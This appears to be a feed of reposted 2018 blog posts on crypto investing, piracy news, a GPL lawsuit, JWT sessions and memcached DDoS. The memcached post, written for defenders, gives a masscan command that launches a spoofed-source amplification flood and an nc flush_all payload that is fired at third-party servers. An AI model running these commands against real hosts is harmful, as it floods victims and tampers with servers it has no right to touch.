The truth about investing in cryptocurrencies is “don’t”. The only responsible way to invest is to buy low-overhead market index funds and hold for retirement. No, you won’t get super rich doing this, but anything other than this is irresponsible gambling.
It’s a hard lesson to learn, because everyone is telling you the opposite. The entire channel CNBC is devoted to day traders, who buy and sell stocks at a high rate based on the same principle as a ponzi scheme, basing their judgment not on the fundamentals (like long term dividends) but animal spirits of whatever stock is hot or cold at the moment. This is the same reason people buy or sell Bitcoin, not because they can describe the fundamental value, but because they believe in a bigger fool down the road who will buy it for even more.
For things like Bitcoin, the trick to making money is to have bought it over 7 years ago when it was essentially worthless, except to nerds who were into that sort of thing. It’s the same tick to making a lot of money in Magic: The Gathering trading cards, which nerds bought decades ago which are worth a ton of money now. Or, to have bought Apple stock back in 2009 when the iPhone was new, when nerds could understand the potential of real Internet access and apps that Wall Street could not.
That was my strategy: be a nerd, who gets into things. I’ve made a good amount of money on all these things because as a nerd, I was into Magic: The Gathering, Bitcoin, and the iPhone before anybody else was, and bought in at the point where these things were essentially valueless.
At this point with cryptocurrencies, with the non-nerds now flooding the market, there little chance of making it rich. The lottery is probably a better bet. Instead, if you want to make money, become a nerd, obsess about a thing, understand a thing when its new, and cash out once the rest of the market figures it out. That might be Brave, for example, but buy into it because you’ve spent the last year studying the browser advertisement ecosystem, the market’s willingness to pay for content, and how their Basic Attention Token delivers value to websites — not because you want in on the ICO craze.


John Oliver spends 25 minutes explaining Bitcoin, Cryptocurrencies, and the Blockchain to you. Sure, it’s funny, but it leaves you worse off than when it started. It admits they “simplify” the explanation, but they simplified it so much to the point where they removed all useful information.

Streaming Link Search Engine Alluc Shuts Down

Post Syndicated from Ernesto original https://torrentfreak.com/streaming-link-search-engine-alluc-shuts-down-180309/

With 80 million streaming links to more than 700 video services, Alluc sold itself as the premier streaming link site.

It offered a wide variety of content and over the past thirteen years it grew out to become one of the largest sites of its kind. This week, however, Alluc surprised friend and foe by shutting down.

“The alluc search engine has been discontinued. After 13 years of alluc, we decided to take a break and focus on other projects,” a message posted on the site’s homepage reads.

That the site was popular is not a secret. People used it to find streaming links to nearly everything, from old movies to the latest hit series. The operators mention that they served a billion unique visitors over the past decade, which is an incredible achievement.

Alluc says farewell

What’s less clear, however, is why the site decided to stop now. In the past, we’ve reported on similar sites that threw in the towel because revenue was dwindling, but Alluc told us that is not the case here.

“The decision was not driven by monetary reasons. We started alluc when we were still in high-school and it became into something bigger and better than we could have ever imagined when we started it,” Alluc’s Sebastian tells us.

“But now it’s time for us to move on. We hope to have contributed a lot to the video space and to have helped out a lot of people during these 13 years of running alluc full time.”

While Alluc could be used to find both authorized and unauthorized content, the movie industry saw it as a blatant pirate site. This resulted in a site blocking request in Australia, among other things.

Alluc, however, always rejected the ‘pirate’ label and saw itself as an “uncensored” search engine. While they are shutting down now, they still see a future for similar services.

“There will always be a future for uncensored search and I hope us shutting down alluc can help to create the vacuum needed to incentivize new sites of similar quality and scope or even a decentralized solution to be created by others,” Sebastian tells us.

Time will tell whether another site will indeed jump in to fill the gap.

Alluc’s API, which is used by third-party apps and services to find streaming links, will remain available until the end of the month when it will shut down. Meanwhile, Alluc’s search engine framework lives on at pron.tv, an adult-themed site.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

ISP Wants EU Court Ruling on Identifying ‘Pirating’ Subscribers

Post Syndicated from Ernesto original https://torrentfreak.com/isp-wants-eu-court-ruling-on-identifying-pirating-subscribers-180308/

In recent years Internet provider Bahnhof has fought hard to protect the privacy of its subscribers.

The company has been a major opponent of extensive data retention requirements, has launched a free VPN to its users, and vowed to protect subscribers from a looming copyright troll invasion.

The privacy-oriented ISP is doing everything in its power to prevent its Swedish customers from being exposed. It has even refused to hand over customer details in piracy cases when these requests are made by the police.

This stance resulted in a lawsuit in which Bahnhof argued that piracy isn’t a serious enough offense to warrant invading the privacy of its customers. The ISP said that this is in line with European privacy regulations.

Last month, the Administrative Court in Stockholm disagreed with this argument, ordering the ISP to hand over the requested information.

The Court ruled that disclosure of subscriber data to law enforcement agencies does not contravene EU law. It, therefore, ordered the ISP to comply, as the Swedish Post and Telecom Authority (PTS) had previously recommended.

While the order is a serious setback for Bahnhof, the ISP isn’t letting the case go just yet. It has filed an appeal where it maintains that disclosing details of alleged pirates goes against EU regulations.

Bahnhof says NO

To settle the matter once and for all, Bahnhof has asked the Swedish Appeals Court to refer the case to the EU Court of Justice, to have an EU ruling on the data disclosure issue.

“Bahnhof, therefore, requires the Court of Appeal to obtain a preliminary ruling from EU law so that the European Court of Justice itself can rule on the matter before the Court of First Instance reaches a final position,” Bahnhof writes.

Law enforcement requests for piracy-related data are quite common in Sweden. Bahnhof previously showed that more than a quarter of all police request for subscriber data were for cases related to online file-sharing, trumping crimes such as grooming minors, forgery and fraud.

The ISP is vowing to fight this case to the bitter end. While it has no problem with law enforcement efforts in general, the company doesn’t want to hand over customer data without proper judicial review of a suspected crime.

“This legal process has already been going on for two years and Bahnhof is ready to continue for as long as necessary to achieve justice. Bahnhof will never agree to hand over delicate sensitive customer data without judicial review,” the company concludes.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan -pU:11211 –banners | grep memcached
This example scans the entire Internet (/0). Replaced with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use  the ‘cut’ to grab just column 6:
… | cut -d ‘ ‘ -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 –spoof-ip –rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening on either (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attacks is to send the “stats” command. This is 15 byte UDP packet that causes the server to send back either a large response full of useful statistics about the server.  You often see around 10 kilobytes of response across several packets.
A harder, but more effect attack uses a two step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100-megabytes of data into the server this way, and causes a retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabytes response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i -w attackers.pcap src port 11221
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en “\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n” | nc -q1 -u 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:112211 –pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shutdown the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here are some good reading on this attack:

Welte: Report from the Geniatech vs. McHardy GPL violation court hearing

Post Syndicated from corbet original https://lwn.net/Articles/748761/rss

Harald Welte attended a hearing in one of the Patrick McHardy GPL cases and
wrote up
what he saw

I’m not arguing for a “too soft” approach. It’s
almost 15 years since the first court cases on license violations on
(embedded) Linux, and the fact that the problem still exists today clearly
shows the industry is very far from having solved a seemingly rather simple

On the other hand, such activities must always be oriented to compliance,
and compliance only. Collecting huge amounts of contractual penalties is
questionable. And if it was necessary to collect such huge amounts to
motivate large corporations to be compliant, then this must be done in the
open, with the community knowing about it, and the proceeds of such
contractual penalties must be donated to free software related entities to
prove that personal financial gain is not a motivation.

Spotify Owned uTorrent Before BitTorrent Inc. Acquired It

Post Syndicated from Ernesto original https://torrentfreak.com/spotify-owned-utorrent-before-bittorrent-acquired-it-180305/

When Spotify launched its first beta in the fall of 2008, we described it as “an alternative to music piracy.

From the start, the Swedish company set out to compete with pirate services by offering a better user experience. Now, a decade later, it has come a long way.

The company successfully transformed into a billion-dollar enterprise and is planning to go public with a listing on the New York Stock Exchange. While it hasn’t completely evaporated music piracy, it has converted dozens of millions of people into paying customers.

While Spotify sees itself as a piracy remedy, backed by the major labels, its piracy roots are undeniable.

In a detailed feature, Swedish newspaper Breakit put a spotlight on one of Spotify’s earliest employees, developer Ludvig Strigeus.

With a significant stake in the company, he is about to become a multi-millionaire, one with a noteworthy file-sharing past. It’s unclear what is current stake in Spotify is, but according to Swedish media it’s worth more than a billion Kroner, which is over $100 million.

Strigeus was the one who launched uTorrent in September 2005, when the BitTorrent protocol was still fairly new. Where most BitTorrent clients at the time were bloatware, uTorrent chose a minimalist approach, but with all essential features.

This didn’t go unnoticed. In just a few months, millions of torrent users downloaded the application which quickly became the dominant file-sharing tool.

Little more than a year after its launch the application was acquired by BitTorrent Inc., which still owns it today. While that part of history is commonly known, there’s a step missing.

Strigeus’ coding talent also piqued the interest of Spotify, which reportedly beat BitTorrent Inc. by a few months. Multiple sources confirm that the streaming startup, which had yet to release its service at the time, bought uTorrent in 2006.

While some thought that Spotify was mainly interested in the technology, others see Strigeus as the target.

“Spotify bought μTorrent, but what we really wanted was Ludvig Strigeus,” former Spotify CEO Andreas Ehn told Breakit.

This indeed sounds plausible as Spotify sold uTorrent to BitTorrent Inc. after a few months, keeping the developer on board. Not a bad decision for the latter, as his Spotify stake makes him a billionaire. At the same time, it was an important move for Spotify too.

Ludvig (Ludde) is still credited in recent uTorrent releases

In addition to having a very talented developer on board, who helped to implement the much needed P2P technology into Spotify, the deal with BitTorrent Inc. brought in cash that funded the development of the tiny, but ambitious, streaming service.

It might be too much to argue that Spotify wouldn’t be where it is without uTorrent and its creator, but their impact on the young company was significant.

The file-sharing angle was also very prominent in the early releases of Spotify. At the time, of all the tracks that were streamed over the Internet by Spotify users, the majority were streamed via P2P connections.

And we haven’t even mentioned that Spotify reportedly used pirate MP3s for its Beta release, including some tracks that were only available on The Pirate Bay.

Spotify’s brief ownership of uTorrent isn’t commonly known, to make an understatement. When BitTorrent Inc. announced that it acquired “uTorrent AB” there was no mention of Spotify, which was still an unknown company at the time.

Times change.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

Using JWT For Sessions

Post Syndicated from Bozho original https://techblog.bozho.net/using-jwt-sessions/

The topic has been discussed many times, on hacker news, reddit, blogs. And the consensus is – DON’T USE JWT (for user sessions).

And I largely agree with the criticism of typical arguments for the JWT, the typical “but I can make it work…” explanations and the flaws of the JWT standard..

I won’t repeat everything here, so please go and read those articles. You can really shoot yourself in the foot with JWT, it’s complex to get to know it well and it has little benefits for most of the usecases. I guess for API calls it makes sense, especially if you reuse the same API in a single-page application and for your RESTful clients, but I’ll focus on the user session usecase.

Having all this criticism, I’ve gone against what the articles above recommend, and use JWT, navigating through their arguments and claiming I’m in a sweet spot. I can very well be wrong.

I store the user ID in a JWT token stored as a cookie. Not local storage, as that’s problematic. Not the whole state, as I don’t need that may lead to problems (pointed out in the linked articles). In fact, I don’t have any session state apart from the user data, which I think is a good practice.

What I want to avoid in my setup is sharing sessions across nodes. And this is a very compelling reason to not use the session mechanism of your web server/framework. No, you don’t need to have millions of users in order to need your application to run on more than one node. In fact, it should almost always run on (at least) two nodes, because nodes die and you don’t want downtime. Sticky sessions at the load balancer are a solution to that problem but you are just outsourcing the centralized session storage to the load balancer (and some load balancers might not support it). Shared session cache (e.g. memcached, elasticache, hazelcast) is also an option, and many web servers (at least in Java) support pluggable session replication mechanisms, but that introduces another component to the archtecture, another part of the stack to be supported and that can possibly break. It is not necessarily bad, but if there’s a simple way to avoid it, I’d go for it.

In order to avoid shared session storage, you need either the whole session state to be passed in the request/response cycle (as cookie, request parameter, header), or to receive a userId and load the user from the database or a cache. As we’ve learned, the former might be a bad choice. Despite that fact that frameworks like ASP.NET and JSF dump the whole state in the HTML of the page, it doesn’t intuitively sound good.

As for the latter – you may say “ok, if you are going to load the user from the database on every request this is going to be slow and if you use a cache, then why not use the cache for the sessions themselves?”. Well, the cache can be local. Remember we have just a few application nodes. Each node can have a local, in-memory cache for the currently active users. The fact that all nodes will have the same user loaded (after a few requests are routed to them by the load balancer in a round-robin fashion) is not important, as that cache is small. But you won’t have to take any care for replicating it across nodes, taking care of new nodes coming and going from the cluster, dealing with network issues between the nodes, etc. Each application node will be an island not caring about any other application node.

So here goes my first objection to the linked articles – just storing the user identifier in a JWT token is not pointless, as it saves you from session replication.

What about the criticism for the JWT standard and the security implications of its cryptography? Entirely correct, it’s easy to shoot yourself in the foot. That’s why I’m using JWT only with MAC, and only with a particular algorithm that I verify upon receiving the token, thus (allegedly) avoiding all the pitfalls. In all fairness, I’m willing to use the alternative proposed in one of the articles – PASETO – but it doesn’t have a Java library and it will take some time implementing one (might do in the future). To summarize – if there was another easy to use way for authenticated encryption of cookies, I’d use it.

So I’m basically using JWT in “PASETO-mode”, with only one operation and only one algorithm. And that should be fine as a general approach – the article doesn’t criticize the idea of having a user identifier in a token (and a stateless application node), it criticizes the complexity and vulnerabilities of the standard. This is sort of my second objection – “Don’t use JWT” is widely understood to mean “Don’t use tokens”, where that is not the case.

Have I introduced some vulnerability in my strive for architectural simplicity and lack of shared state? I hope not.

The post Using JWT For Sessions appeared first on Bozho's tech blog.

Comcast’s Protected Browsing Blocks TorrentFreak as “Suspicious” Site

Post Syndicated from Ernesto original https://torrentfreak.com/comcasts-protected-browsing-blocks-torrentfreak-as-suspicious-site-18004/

Regular TorrentFreak readers know that website blocking is rampant around the globe.

Thousands of pirate sites have been blocked by court orders for offering access to infringing content. However, there are plenty of voluntary blocking measures as well.

Some Internet providers offer web filtering tools to help their customers avoid malware, adult content, pirate services, or other suspicious content. Comcast’s Xfinity Xfi service, for example, has a “protected browsing” feature.

While this can be useful in some situations, it’s far from perfect. The blocklists that are used can be quite broad. Websites are sometimes miscategorized or flagged as dangerous while that’s not the case.

This also appears to be happening with Xfinity’s protected browsing feature. A reader alerted us that, when he tried to access TorrentFreak, access was denied stating that a “suspicious” site was ahead.

A pirate logo on the blocking page suggests that there’s copyright-infringing activity involved. While it’s no secret that we cover a lot of news related to piracy, it goes a bit far to label this type of news reporting as suspicious.


While we don’t know whether the blockade is intentional or a false positive, this is certainly not the only ‘problem’ with Xfinity’s protected browsing feature.

Previously, Comcast users reported that this system prevented people from accessing PayPal as well, which is a bit much, and others reported that it stopped the Steam store from loading properly.

The good news is that the blocking ‘feature’ isn’t mandatory. Subscribers can enable and disable it whenever they please, by changing their network settings.

Unfortunately, Xfinity’s blocking efforts are not unique. We regularly get reports from users who can’t access TorrentFreak because it’s blocked, often on public WiFi networks. In these and other cases, a VPN can always come in handy.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons